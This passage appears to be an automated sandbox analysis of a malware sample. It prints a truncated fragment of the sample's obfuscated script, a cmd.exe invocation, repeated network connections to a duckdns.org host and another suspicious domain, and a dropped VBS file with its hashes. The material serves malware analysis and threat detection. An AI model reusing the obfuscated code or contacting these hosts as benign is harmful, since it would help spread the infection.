chorEKons lEnn.svVa beiBargonSt reaPre.n=Medal$ DetaWMedlehSkdete.lethyKomiteFerskyH,dro.Mon.bsT,ansu ResebReinesRe.letFluesrDressiFlaglnTrencgIn.vi(,ancr$IndusTHome.aHderss.kifthLseti,Testu$ StamFTorskrDisseuJobbegB.sint,aaobsZymoluPerknkJ,hankAtomseT lpir CatheDefortRejeksAchro)Sanit ');Compulsed $Elvina;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 mayxw9402.duckdns.org udp
US 12.221.146.138:9402 mayxw9402.duckdns.org tcp
US 8.8.8.8:53 de.healthandwellnessblog.za.com udp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp

Files

memory/1716-0-0x000007FEF5B73000-0x000007FEF5B74000-memory.dmp

memory/1716-1-0x0000000000B10000-0x0000000000B20000-memory.dmp

memory/1716-6-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qyohla.vbs

MD5 c6ea093c28624fba97ebea592736640c
SHA1 b989c4f2377c8cb0e362b0ad96238194ae0e534a
SHA256 4c50875efb6badccfe526c866dab42b2f6a40e8a490e1cb6119020ed4849dbce
SHA512 3194847043a76863b583bc386a3e90443132b18de9563ac98d940f22d9fd61c39109008ccd1f92fc2a3b05e3815998a62abfc820ec0e8b2c14a41d009bd51f58

memory/1716-11-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

memory/2848-16-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2848-17-0x0000000001EF0000-0x0000000001EF8000-memory.dmp